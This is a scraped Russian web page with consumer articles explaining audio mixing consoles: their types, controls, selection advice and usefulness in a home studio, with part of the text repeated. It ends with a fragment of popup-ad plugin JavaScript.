Зачем нужен стерео микшер

Данный термин хорошо знаком людям, которым приходится работать со звуком: музыкантам, операторам, работникам радио и телевидения, ди-джеям, организаторам развлекательных мероприятий. Микшер (или микшерный пульт/микшерная консоль) — это устройство для обработки звука. Нужен такой прибор не только профессионалам, ведь звуковая какофония может испортить даже небольшой семейный праздник, выступление начинающих музыкантов и любительскую видео- либо аудиозапись. Попробуем разобраться, что такое микшер, для чего нужен микшерный пульт, где он используется, и как выбрать устройство под конкретные нужды.

Для чего нужен микшерный пульт

Разные звуки отличаются по громкости, высоте, тембру. В естественных условиях они могут заглушать друг друга, смешиваться, создавать сочетания, которые неприятны для человеческого уха. В больших помещениях нужно увеличивать громкость, иначе звуковое сопровождение воспримут только те слушатели, которые находятся рядом с источником звука.

Но простое повышение громкости сказывается на качестве аудио: появляются характерные искажения (например, дребезжание и шумы), низкие тона становятся чересчур тяжелыми, а высокие — пронзительными и резкими. Чтобы избежать этих явлений, нужно предварительно обработать отдельные звуковые дорожки, а затем объединить их — именно эти функции выполняет микшер.

Как работает микшер

Данный аудио-прибор принимает входные сигналы — отдельные музыкальные партии, голоса, фоновые звуки. Каждый сигнал принято называть каналом. К устройству можно подсоединять микрофоны, инструменты (midi-клавиатуру, синтезатор, выход гитарного усилителя), цифровые носители. Сигналы, которые поступают на пульт, обрабатываются разными способами, среди которых выделяются следующие:

  • балансировка громкости;
  • частотная обработка (если изменить частоту сигнала, можно обогатить звучание, а обрезка лишних частот выравнивает звук и убирает помехи);
  • добавление эффектов.

Затем отдельные сигналы соединяют в единую звуковую дорожку и записывают в файл (в ноутбуке или стационарном компьютере должен быть установлен специальный софт) или направляют на устройство выхода (динамик, колонки).

На заметку! Настройки, которые применяются во время работы, можно сохранять, чтобы впоследствии не требовалось заново выставлять нужные параметры для похожих проектов.

Виды микшерных пультов

Микшерные консоли встречаются самых разных видов в зависимости от многих параметров, а именно: формата обрабатываемого звукового сигнала, размеров устройства и целей его преимущественного использования.

По способу работы со звуком

По способу представления звука микшеры делятся на аналоговые и цифровые. В аналоговых устройствах звук — непрерывный электрический сигнал, а в цифровых звуковая волна преобразуется в последовательность чисел, которые указывают на значение амплитуды аудиосигнала в определенный момент времени.

По габаритам

В зависимости от габаритов и способа установки различают следующие типы микшерных консолей:

Стационарное оборудование используется в профессиональных студиях звукозаписи, а также на крупных концертных площадках. Оно предназначено для обработки большого количества сигналов. Такие пульты отличаются внушительными размерами и весом.

Переносное оборудование меньше и легче стационарного. В таких пультах обычно не более 20 каналов. Эти приборы можно переносить, чтобы работать в студиях, на выступлениях или выездных мероприятиях.

У портативного оборудования 6-8 каналов, небольшие размеры, малый вес. Такие микшеры используют для организации небольших праздников, выступлений под готовое звуковое сопровождение, любительских концертов и аудиозаписи в домашних условиях.

По предназначению

По назначению микшерные консоли делятся на:

  • студийные — для многоканальной записи музыки и звуковых дорожек;
  • концертные — для выступлений вживую или под фонограмму;
  • диджейские — для работы с сэмплами, виниловыми пластинками, добавления спецэффектов прямо во время выступления Dj в клубах, на дискотеках;
  • эфирные — для работы на радио и телевидении, подачи готовой фонограммы, живой музыки и речи в эфир, приема звонков;
  • универсальные — для выполнения нескольких задач.

Микшерские пульты каждого вида подходят для конкретных задач. Модели, которые считаются универсальными, не используются в сложных проектах с высокими требованиями к качеству звука.

Как устроен микшер

Между отдельными видами и моделями пультов имеется множество отличий, но некоторые компоненты присутствуют во всех приборах для обработки и смешивания звука. Устройство состоит из:

  • секции входов;
  • секции выходов;
  • регуляторов.

Входные каналы бывают моно- и стереофоническими, у последних два входа на один сигнал. У каждого монофонического канала по два разъема: линейный и для микрофона. У каналов для работы со стерео нет гнезд под микрофоны.

На заметку! Во многих моделях микшеров звук, который поступает на каждый вход, балансируется по громкости и очищается от шумов. Такие входы называют балансными.

После обработки сигналы группируются и подаются на выходные каналы. Среди них выделяют линейные выходы — разъемы, которые предназначены для вывода звука на внешние устройства.

Управление звуком осуществляется с помощью поворотных регуляторов или ползунков, а также переключателей в форме кнопок или рычажков. Отдельные каналы по необходимости можно включать или выключать, чтобы прослушать результат обработки. Количество элементов управления зависит от числа каналов.

У цифровых микшеров информация о сигналах часто выводится на небольшой жидкокристаллический дисплей. Некоторыми моделями можно управлять с мобильного устройства, но для этого потребуется программа, которую нужно установить с официального сайта производителя оборудования.

Параметры напряжения на входах и выходах, типы разъемов, назначение регуляторов и другие сведения можно узнать из документации к микшерной консоли. Инструкция с иллюстрациями и обозначениями поможет подготовиться к работе новичку и опытному пользователю.

Где применяются микшеры

Оборудование с большим количеством каналов используется в студиях для профессиональной записи звука: музыкальных композиций, звукового сопровождения к фильмам. Концертный пульт необходим для организации выступлений. Переносные устройства подходят для проведения праздников и общественных мероприятий на небольших площадках, в торговых и развлекательных центрах, учебных заведениях. Усилитель звука в мобильных пультах бывает встроенным, чтобы не возникало необходимости в отдельном приборе, который необходимо переводить с места на место.

Эфирные пульты используются в теле- и радиовещании. Диджейские консоли можно встретить не только в ночных клубах — небольшие модели используются на праздниках: корпоративах, свадьбах, семейных торжествах. Для чайников, непрофессиональных коллективов, а также тех, кому требуется несложное звуковое сопровождение, подходят портативные микшеры. Как их подключать, можно узнать в этом же разделе.

Плюсы и минусы микшерных пультов

В каждом виде микшерной консоли есть свои преимущества и недостатки. Зачастую они связаны с применением не по прямому предназначению (например, использование портативного пульта при проведении концерта), но есть и общие похвалы и замечания, основные из которых сведены в таблицу.

Аналоговые Цифровые
Преимущества Аналоговые приборы дешевле, их легко освоить. У них относительно несложная конструкция, поэтому такие пульты проще ремонтировать. Эти микшеры самые надежные — они способны проработать дольше 10 лет. Цифровые устройства значительно меньше и легче аналоговых. Многие процессы в них автоматизированы, последовательности нужных действий можно запрограммировать.
Недостатки Аналоговые микшеры громоздкие и тяжелые. Их приходится долго настраивать из-за отсутствия автоматизации. Такая техника потребляет больше электроэнергии, сильнее нагревается. Цифровые приборы сложнее в освоении — к их интерфейсу порой подолгу привыкают даже профессионалы. Ремонт микшера этого типа может обойтись недешево, а поломка одного компонента приводит к неработоспособности всего устройства.

На заметку! Существует мнение, что звук, который получается при работе на аналоговом микшере, теплее, лучше, приятней на слух. Это распространенный миф. Оцифровка звуковых волн сама по себе не может ухудшить сигнал. Если правильно задать параметры и грамотно использовать фильтры, результат на выходе будет качественным вне зависимости от начинки микшера.

Как выбрать микшер

Чтобы не ошибиться с выбором, нужно в первую очередь решить, где будет использоваться аппарат. Какой тип микшера подойдет в конкретном случае, зависит от рода деятельности покупателя. Профессионалы предпочтут модель с большим количеством каналов и возможностей, любителям же лучше обратить внимание на более простые образцы.

При выборе модели по числу каналов нужно учитывать уровень знаний пользователя, количество оборудования, которое планируется подключать, степень сложности работы со звуком. Нет смысла покупать микшер со множеством разъемов и регуляторов, если в дальнейшем потребуется подсоединять к нему один микрофон и электрогитару.

На вес и габариты аппаратуры стоит обращать внимание, если микшер нужно будет часто перевозить.

Совет! Перед покупкой микшерной консоли следует узнать, какие сервисные центры занимаются ремонтом выбранной модели, где они находятся, на каких условиях предоставляют услуги. И нужно помнить, что обучение тонкостям работы со звуком поможет справиться со многими проблемами, которые на первый взгляд кажутся неразрешимыми.

Можно ли обойтись без микшера

Начинающие музыканты часто сомневаются в собственных силах и необходимости покупать довольно сложный прибор для экспериментов со звуком. В этом случае стоит повременить с выбором аппаратного микшера и начать осваивать программный. В компьютере можно создавать электронную музыку такого же качества, как и с применением физической микшерной консоли. Эквалайзер, регуляторы громкости, фильтры и спецэффекты — все это можно найти в программах, которые разрабатываются для музыкантов разного уровня. Чаще всего такие приложения работают под операционной системой Windows 10 или 7. Обычно создатели указывают минимальные требования в описаниях к софту.

Важно! Загружать программы-микшеры, аудиоредакторы и другие приложения нужно с официальных сайтов компаний, которые разрабатывают ПО. В противном случае существует риск установить вредоносный софт, например, вирус Webhelper.

Итак, запись музыки, озвучка видео, звуковое оформление мероприятия может стать проблемой без подходящего оборудования. Правильно подобранный микшер облегчит работу начинающего и опытного звукооператора, прослужит ему не один год, поможет повысить уровень профессионального мастерства. Выбор определенной модели зависит от потребностей покупателя и его финансовых возможностей. Однако модно изготовить микшер и собственноручно.

Самые лучшие микшерные пульты

Soundcraft Signature 12 аналоговый 12-канальный микшер на Яндекс Маркете

Аналоговый микшер Yamaha MG12XU на Яндекс Маркете

Soundcraft EPM8 микшерный пульт, 8 моно + 2 стерео входа, микрофонные предусилители GB-30 на Яндекс Маркете

Soundcraft EFX8 микшерный пульт с процессором эффектов на Яндекс Маркете

Аналоговый микшер Eurosound Compact-4USB на Яндекс Маркете

Данный термин хорошо знаком людям, которым приходится работать со звуком: музыкантам, операторам, работникам радио и телевидения, ди-джеям, организаторам развлекательных мероприятий. Микшер (или микшерный пульт/микшерная консоль) — это устройство для обработки звука. Нужен такой прибор не только профессионалам, ведь звуковая какофония может испортить даже небольшой семейный праздник, выступление начинающих музыкантов и любительскую видео- либо аудиозапись. Попробуем разобраться, что такое микшер, для чего нужен микшерный пульт, где он используется, и как выбрать устройство под конкретные нужды.

Для чего нужен микшерный пульт

Разные звуки отличаются по громкости, высоте, тембру. В естественных условиях они могут заглушать друг друга, смешиваться, создавать сочетания, которые неприятны для человеческого уха. В больших помещениях нужно увеличивать громкость, иначе звуковое сопровождение воспримут только те слушатели, которые находятся рядом с источником звука.

Но простое повышение громкости сказывается на качестве аудио: появляются характерные искажения (например, дребезжание и шумы), низкие тона становятся чересчур тяжелыми, а высокие — пронзительными и резкими. Чтобы избежать этих явлений, нужно предварительно обработать отдельные звуковые дорожки, а затем объединить их — именно эти функции выполняет микшер.

Как работает микшер

Данный аудио-прибор принимает входные сигналы — отдельные музыкальные партии, голоса, фоновые звуки. Каждый сигнал принято называть каналом. К устройству можно подсоединять микрофоны, инструменты (midi-клавиатуру, синтезатор, выход гитарного усилителя), цифровые носители. Сигналы, которые поступают на пульт, обрабатываются разными способами, среди которых выделяются следующие:

  • балансировка громкости;
  • частотная обработка (если изменить частоту сигнала, можно обогатить звучание, а обрезка лишних частот выравнивает звук и убирает помехи);
  • добавление эффектов.

Затем отдельные сигналы соединяют в единую звуковую дорожку и записывают в файл (в ноутбуке или стационарном компьютере должен быть установлен специальный софт) или направляют на устройство выхода (динамик, колонки).

На заметку! Настройки, которые применяются во время работы, можно сохранять, чтобы впоследствии не требовалось заново выставлять нужные параметры для похожих проектов.

Виды микшерных пультов

Микшерные консоли встречаются самых разных видов в зависимости от многих параметров, а именно: формата обрабатываемого звукового сигнала, размеров устройства и целей его преимущественного использования.

По способу работы со звуком

По способу представления звука микшеры делятся на аналоговые и цифровые. В аналоговых устройствах звук — непрерывный электрический сигнал, а в цифровых звуковая волна преобразуется в последовательность чисел, которые указывают на значение амплитуды аудиосигнала в определенный момент времени.

По габаритам

В зависимости от габаритов и способа установки различают следующие типы микшерных консолей:

Стационарное оборудование используется в профессиональных студиях звукозаписи, а также на крупных концертных площадках. Оно предназначено для обработки большого количества сигналов. Такие пульты отличаются внушительными размерами и весом.

Переносное оборудование меньше и легче стационарного. В таких пультах обычно не более 20 каналов. Эти приборы можно переносить, чтобы работать в студиях, на выступлениях или выездных мероприятиях.

У портативного оборудования 6-8 каналов, небольшие размеры, малый вес. Такие микшеры используют для организации небольших праздников, выступлений под готовое звуковое сопровождение, любительских концертов и аудиозаписи в домашних условиях.

По предназначению

По назначению микшерные консоли делятся на:

  • студийные — для многоканальной записи музыки и звуковых дорожек;
  • концертные — для выступлений вживую или под фонограмму;
  • диджейские — для работы с сэмплами, виниловыми пластинками, добавления спецэффектов прямо во время выступления Dj в клубах, на дискотеках;
  • эфирные — для работы на радио и телевидении, подачи готовой фонограммы, живой музыки и речи в эфир, приема звонков;
  • универсальные — для выполнения нескольких задач.

Микшерские пульты каждого вида подходят для конкретных задач. Модели, которые считаются универсальными, не используются в сложных проектах с высокими требованиями к качеству звука.

Как устроен микшер

Между отдельными видами и моделями пультов имеется множество отличий, но некоторые компоненты присутствуют во всех приборах для обработки и смешивания звука. Устройство состоит из:

  • секции входов;
  • секции выходов;
  • регуляторов.

Входные каналы бывают моно- и стереофоническими, у последних два входа на один сигнал. У каждого монофонического канала по два разъема: линейный и для микрофона. У каналов для работы со стерео нет гнезд под микрофоны.

На заметку! Во многих моделях микшеров звук, который поступает на каждый вход, балансируется по громкости и очищается от шумов. Такие входы называют балансными.

После обработки сигналы группируются и подаются на выходные каналы. Среди них выделяют линейные выходы — разъемы, которые предназначены для вывода звука на внешние устройства.

Управление звуком осуществляется с помощью поворотных регуляторов или ползунков, а также переключателей в форме кнопок или рычажков. Отдельные каналы по необходимости можно включать или выключать, чтобы прослушать результат обработки. Количество элементов управления зависит от числа каналов.

У цифровых микшеров информация о сигналах часто выводится на небольшой жидкокристаллический дисплей. Некоторыми моделями можно управлять с мобильного устройства, но для этого потребуется программа, которую нужно установить с официального сайта производителя оборудования.

Параметры напряжения на входах и выходах, типы разъемов, назначение регуляторов и другие сведения можно узнать из документации к микшерной консоли. Инструкция с иллюстрациями и обозначениями поможет подготовиться к работе новичку и опытному пользователю.

Где применяются микшеры

Оборудование с большим количеством каналов используется в студиях для профессиональной записи звука: музыкальных композиций, звукового сопровождения к фильмам. Концертный пульт необходим для организации выступлений. Переносные устройства подходят для проведения праздников и общественных мероприятий на небольших площадках, в торговых и развлекательных центрах, учебных заведениях. Усилитель звука в мобильных пультах бывает встроенным, чтобы не возникало необходимости в отдельном приборе, который необходимо переводить с места на место.

Эфирные пульты используются в теле- и радиовещании. Диджейские консоли можно встретить не только в ночных клубах — небольшие модели используются на праздниках: корпоративах, свадьбах, семейных торжествах. Для чайников, непрофессиональных коллективов, а также тех, кому требуется несложное звуковое сопровождение, подходят портативные микшеры. Как их подключать, можно узнать в этом же разделе.

Плюсы и минусы микшерных пультов

В каждом виде микшерной консоли есть свои преимущества и недостатки. Зачастую они связаны с применением не по прямому предназначению (например, использование портативного пульта при проведении концерта), но есть и общие похвалы и замечания, основные из которых сведены в таблицу.

Аналоговые Цифровые
Преимущества Аналоговые приборы дешевле, их легко освоить. У них относительно несложная конструкция, поэтому такие пульты проще ремонтировать. Эти микшеры самые надежные — они способны проработать дольше 10 лет. Цифровые устройства значительно меньше и легче аналоговых. Многие процессы в них автоматизированы, последовательности нужных действий можно запрограммировать.
Недостатки Аналоговые микшеры громоздкие и тяжелые. Их приходится долго настраивать из-за отсутствия автоматизации. Такая техника потребляет больше электроэнергии, сильнее нагревается. Цифровые приборы сложнее в освоении — к их интерфейсу порой подолгу привыкают даже профессионалы. Ремонт микшера этого типа может обойтись недешево, а поломка одного компонента приводит к неработоспособности всего устройства.

На заметку! Существует мнение, что звук, который получается при работе на аналоговом микшере, теплее, лучше, приятней на слух. Это распространенный миф. Оцифровка звуковых волн сама по себе не может ухудшить сигнал. Если правильно задать параметры и грамотно использовать фильтры, результат на выходе будет качественным вне зависимости от начинки микшера.

Как выбрать микшер

Чтобы не ошибиться с выбором, нужно в первую очередь решить, где будет использоваться аппарат. Какой тип микшера подойдет в конкретном случае, зависит от рода деятельности покупателя. Профессионалы предпочтут модель с большим количеством каналов и возможностей, любителям же лучше обратить внимание на более простые образцы.

При выборе модели по числу каналов нужно учитывать уровень знаний пользователя, количество оборудования, которое планируется подключать, степень сложности работы со звуком. Нет смысла покупать микшер со множеством разъемов и регуляторов, если в дальнейшем потребуется подсоединять к нему один микрофон и электрогитару.

На вес и габариты аппаратуры стоит обращать внимание, если микшер нужно будет часто перевозить.

Совет! Перед покупкой микшерной консоли следует узнать, какие сервисные центры занимаются ремонтом выбранной модели, где они находятся, на каких условиях предоставляют услуги. И нужно помнить, что обучение тонкостям работы со звуком поможет справиться со многими проблемами, которые на первый взгляд кажутся неразрешимыми.

Можно ли обойтись без микшера

Начинающие музыканты часто сомневаются в собственных силах и необходимости покупать довольно сложный прибор для экспериментов со звуком. В этом случае стоит повременить с выбором аппаратного микшера и начать осваивать программный. В компьютере можно создавать электронную музыку такого же качества, как и с применением физической микшерной консоли. Эквалайзер, регуляторы громкости, фильтры и спецэффекты — все это можно найти в программах, которые разрабатываются для музыкантов разного уровня. Чаще всего такие приложения работают под операционной системой Windows 10 или 7. Обычно создатели указывают минимальные требования в описаниях к софту.

Важно! Загружать программы-микшеры, аудиоредакторы и другие приложения нужно с официальных сайтов компаний, которые разрабатывают ПО. В противном случае существует риск установить вредоносный софт, например, вирус Webhelper.

Итак, запись музыки, озвучка видео, звуковое оформление мероприятия может стать проблемой без подходящего оборудования. Правильно подобранный микшер облегчит работу начинающего и опытного звукооператора, прослужит ему не один год, поможет повысить уровень профессионального мастерства. Выбор определенной модели зависит от потребностей покупателя и его финансовых возможностей. Однако модно изготовить микшер и собственноручно.

Самые лучшие микшерные пульты

Soundcraft Signature 12 аналоговый 12-канальный микшер на Яндекс Маркете

Аналоговый микшер Yamaha MG12XU на Яндекс Маркете

Soundcraft EPM8 микшерный пульт, 8 моно + 2 стерео входа, микрофонные предусилители GB-30 на Яндекс Маркете

Soundcraft EFX8 микшерный пульт с процессором эффектов на Яндекс Маркете

Аналоговый микшер Eurosound Compact-4USB на Яндекс Маркете

Микшерный пульт. Что это?

Это устройство, основная задача которого – суммирование нескольких звуковых сигналов в один. Но современные микшерные пульты, кроме этой функции, выполняют ряд других:

• коррекцию сигналов (эквализация, компрессирование, спецэффекты);
• маршрутизацию (пульт – это сердце любой концертной площадки или студии, от него расходятся провода к другому оборудованию);
• усиление (такой микшер можно подключать сразу к акустическим системам);
• запись на компьютер или на внешний носитель.

Как разобраться во всем этом многообразии?

Виды микшерных пультов

Все микшерные пульты условно делятся на диджейские, концертные, студийные, для радиовещания и прочие. У всех есть своя специфика, и этот важнейший фактор нельзя не учитывать.

У диджейских пультов обычно меньше каналов, чем у концертных, но в них реализованы специальные функции:

• фейдер между парой стереоисточников, позволяющий одним движением микшировать их;
• специальный эквалайзер, в прямом смысле убивающий частоты;
• процессор эффектов с лупером или специальный вход с тон-корректором для подключения проигрывателей винила (или, как их еще называют, вертушек).

На фото – диджейский микшерный пульт

Эти функции, скорее всего, будут бесполезны для концертной или студийной деятельности, но вот провести дискотеку с другим микшерным пультом не получится.

Сейчас очень популярны стали DJ-контроллеры. Это микшерные DJ-пульты, объединенные с многоканальной (обычно две стереопары) звуковой картой и управляемые специальной программой с компьютера. Если источником звука будет только компьютер, то нет смысла покупать обычный DJ-микшер. Более целесообразной покупкой станет DJ-контроллер.

На фото – DJ-контроллер

У концертных пультов повышенное внимание уделяют надежности и удобству оперативной работы при частых выездах. Такой пульт должен обладать развитой архитектурой – возможностью подключать разнообразное дополнительное оборудование и маршрутизировать сигнал на различные зоны звукоусиления. К концертным пультам относятся зонные и мониторные пульты, а также различные сплиттеры, решающие узкие задачи во время крупных концертов.

На фото – концертный микшерный пульт

У современных студийных пультов ценятся, прежде всего, уровень качества звука и возможность сохранения настроек. Сейчас повсеместно используют цифровые пульты, позволяющие одним касанием вернуться к незаконченному треку и продолжить его сведение в любое время. У студийных пультов часто обращают внимание на такие субъективные параметры, как сводимость и прослушиваемость, характеризующие баланс инструментов при производстве готовой записи.

На фото – современный студийный микшерный пульт

Радиовещательные пульты в некотором смысле похожи на DJ-пульты (не зря люди в эфирной студии чаще себя называют диджеями, чем ведущими). Однако у этих пультов есть некоторые дополнительные функции, например, возможность общаться вне эфира со студией или звонящими по телефону слушателями, запуск фонограммы от канала фейдера, специальная динамическая обработка управляемыми компрессорами. Все это абсолютно не нужно в студии или на концертной площадке.

На фото радиовещательный микшерный пульт

В зависимости от количества каналов микшерные пульты делятся на портативные, переносные и стационарные.

Портативные пульты – компактные устройства, как правило, бюджетного класса, выполняющие минимум возложенных на них задач. Обычно они используются там, где не нужно много каналов и нет необходимости подключать музыкальные инструменты. Особенностью портативных пультов является применение круговых потенциометров, благодаря которым устройства обладают малыми весом и габаритами, их легко носить с собой, и они не занимают много места в домашней студии.

На фото – портативный микшерный пульт

Кстати, вы можете посмотреть наше видео про 5 самых интересных представителей этих микшерных пультов на канале:

Переносные микшерные пульты – это полупрофессиональные и профессиональные модели, которые используются при проведении различных мероприятий: концертов, студийных звукозаписей и др. Такие устройства имеют больше каналов, чем портативные модели. В концертной деятельности часто используются активные микшеры со встроенным усилителем мощности. В них есть все, что характерно для качественных микширования и записи.

На фото – переносной микшерный пульт

Стационарные микшерные пульты – это профессиональные устройства с большим количеством каналов. Используют их при проведении больших концертов и в студиях звукозаписи профессионального уровня. Все чаще встречаются цифровые микшерные пульты, которые позволяют вести многоканальную запись звука на компьютер, обладают широчайшими возможностями обработки звука, умеют запоминать все настройки конкретного студийного проекта и в значительной степени облегчают труд звукорежиссеров.

На фото – стационарный микшерный пульт

Основные характеристики микшерных пультов

Количество каналов: что об этом нужно знать?

Если пульт называется 10-канальным, это не означает, что он имеет 10 микрофонных входов. Стереовход (например, для подключения стереоплеера) – это два канала. Также существует дополнительный, нерегулируемый вход TAPE (CD) IN, подающий линейный стереосигнал сразу на мастер шину: ему тоже нужны два канала. Таким образом, у 10-канального микшерного пульта могут быть 4 микрофонных моновхода, 2 стереовхода для подключения стереоисточников и дополнительный вход для подключения проигрывателя на мастер-секцию.

Как мы заметили выше, у микшерных пультов есть микрофонные и линейные входы. Они могут быть балансными и небалансными. Большинство пультов имеет балансные входы, что способствует большей помехозащищенности и, как следствие, уменьшению шумов. Поэтому следует применять балансные (их еще называют симметричными), преимущественно XLR-разъемы.

Интерфейс микшерного пульта

Все управление сигналом в микшерном пульте можно разделить на поканальное и общее.

Каждый канал микшерного пульта обычно содержит:

Линейный вход 1/4" TRS (толстый джек).

Очень часто микрофонный и линейный входы выполняются на бюджетных пультах для экономии места на так называемом COMBO разъеме. В него можно подключить и XLR, и Jack.

Разрыв (Insert), который обеспечивает направление сигнала на внешнее устройство обработки (чаще всего компрессор) и его прием обратно от этого устройства.

Регулятор чувствительности GAIN, позволяющий настраивать входной канал микшера для работы с любыми источниками.

Эквалайзеры.Бюджетные модели имеют двух- или трехполосный эквалайзер. Более дорогие и профессиональные модели обычно подразумевают параметрическую регулировку, меняющую не только уровень каждой регулируемой частоты, но и саму частоту. Этот вариант удобен при концертной и студийной работах, поскольку позволяет сделать более точную и глубокую коррекцию сигнала в диапазоне средних частот.

Посыл (Send), который делает возможным подмешивание в сигнал канала обработанного сигнала от внешнего устройства обработки.

Регулятор панорамы, отвечающий за управление уровнем сигнала, который будет направляться в общие левый и правый каналы.

Коммутацию, при которой с помощью кнопок определяются активность и маршрут сигнала.

Регулятор уровня громкости. На бюджетных моделях он выполнен на круговых потенциометрах, на профессиональных пультах на вертикальных фейдерах: чем он длиннее, тем более точно можно выставлять уровень сигнала.

К общему управлению относятся подгруппы, позволяющие объединить выбранные каналы для дальнейшего управления. Общая секция содержит выход на наушники, коммутацию (посылы и возвраты AUX, выходы на мониторы), встроенные DSP-процессоры. Обязателен также индикатор уровней. На профессиональных пультах есть встроенный микрофон для переговоров со звукорежиссером, специальный выход для подключения подсветки и многое другое.

Нужен ли микшер в домашней студии?

Теперь, когда мы знаем почти все о микшерных пультах, ответим на главный вопрос, который нам задают: «У меня домашняя студия. Имеет ли смысл купить в нее микшер?».

В минимальный состав домашней студии обычно входят:

– микрофон;
– звуковая карта;
– наушники;
– студийные мониторы;
– MIDI-клавиатура;
– коммутация и стойки.

Нужен ли в этом случае пульт? Наш ответ ? НЕТ. Микшерный пульт для записи не нужен: он не только не улучшит запись, но и, скорее всего, ухудшит ее. Конечно, если вы не используете свою студию для того, чтобы делать «четкие» фотки на его фоне:) 🙂

Почему мы так считаем?

1. Современные звуковые карты содержат в себе микрофонные предусилители качества, обычно превышающие аналогичные предусилители у пультов. Предусилитель стоит не дешевле 100 долларов, в 10-канальном пульте используется как минимум 4 микрофонных предусилителя, еще имеются стереовходы. Тем не менее цена на пульт от этого не вырастает выше 400 долларов. Вполне нормальный 10-канальный пульт можно купить за 120–150 долларов (он будет даже с процессором эффектов, который тоже отдельно стоит от 100 долларов). Логично, что при таких обстоятельствах выбор ? в пользу аудиоинтерфейсов и отдельных предусилителей.

Карты, кстати, могут иметь до 16 (и даже до 32) входных каналов и позволяют записать любой источник сигнала.

2. При записи с микрофона не рекомендуется пользоваться эквализацией или другой динамической обработкой, например, компрессором. Вы можете испортить свою запись, и при конечном сведении ошибку не получится исправить.

3. Сведение в 99 % случаев будет происходить в секвенсоре (специальной программе). Оставшийся 1 % приходится на дорогие аналоговые микшерные консоли. Стоимость таких пультов начинается сейчас от 500 000 рублей, они требуют большого количества дорогостоящей дополнительной обработки, и это совсем не домашняя звукозапись. Сводить на 8-канальном пультике за 10 000 рублей и получать великолепный результат, увы, невозможно.

4. Многие рассматривают микшерные пульты с USB на борту. К сожалению, для студийной записи эти пульты абсолютно бесполезны. Они оцифровывают только мастер-секцию, а писать поканально с ними нельзя. Другими словами, вы не сможете слушать через такой пульт минусовую фонограмму и писать вокал на отдельную дорожку: записываться будет уже готовый микс. Но для небольших выступлений это находка: не нужна звуковая карта, вы подключаетесь напрямую к ноутбуку и имеете звук в разы лучше, чем через встроенную звуковую карту. Чем больше мощность, тем заметней будет разница.
Но все вышеперечисленное не ставит крест на использовании микшерных пультов в домашней студии для мониторинга.

Пульт может быть полезен, потому что:

— У вас появится дополнительный выход на наушники (еще один есть в обязательном порядке на звуковой карте).

Заметим, что если вам нужно подключить более двух пар наушников, есть специальные предусилители для наушников. Их использование более практично.

— Вы сможете подключить через пульт не одну, а две пары мониторов.

Для серьезных студий существуют специальные мониторные микшеры. Они позволяют с большой гибкостью маршрутизировать сигнал.

На фото – специальный мониторный микшерный пульт

— Появится возможность в режиме мониторинга пользоваться эквализацией и оценивать необходимость частотной коррекции в реальном времени.

— Наконец, вы спокойно сможете перед записью порепетировать с товарищами, не думая, как это все воткнуть в вашу звуковую карту.

Оцените статью
ПК Знаток
Добавить комментарий

Adblock
detector
":'':"",document.createElement("div"),c=ff(window),b=ff("body"),g=void 0===flatPM_getCookie("flat_modal_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+a.ID+"_mb"),i="scroll.flatmodal"+a.ID,m="mouseleave.flatmodal"+a.ID+" blur.flatmodal"+a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&"true"==a.how.popup.timer&&(t=ff('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))},s=function(){void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie&&g&&(flatPM_setCookie("flat_modal_"+a.ID+"_mb",!1),ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l()),void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie||(ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l())},ff("body > *").eq(0).before('
'+p+"
"),w=document.querySelector('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_modal-content'),flatPM_setHTML(w,e),"px"==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer&&(t=ff('.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie&&g&&(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n(),b.on("click",'.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_cross',function(){flatPM_setCookie("flat_out_"+a.ID+"_mb",!1)})),void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie||(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n())}var _,u="0"!=a.how.outgoing.indent?' style="bottom:'+a.how.outgoing.indent+'px"':"",p="true"==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer?'
Закрыть через '+a.how.outgoing.timer_count+"
":'':"",c=ff(window),h="scroll.out"+a.ID,m="mouseleave.outgoing"+a.ID+" blur.outgoing"+a.ID,g=void 0===flatPM_getCookie("flat_out_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+a.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(a.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+p+"
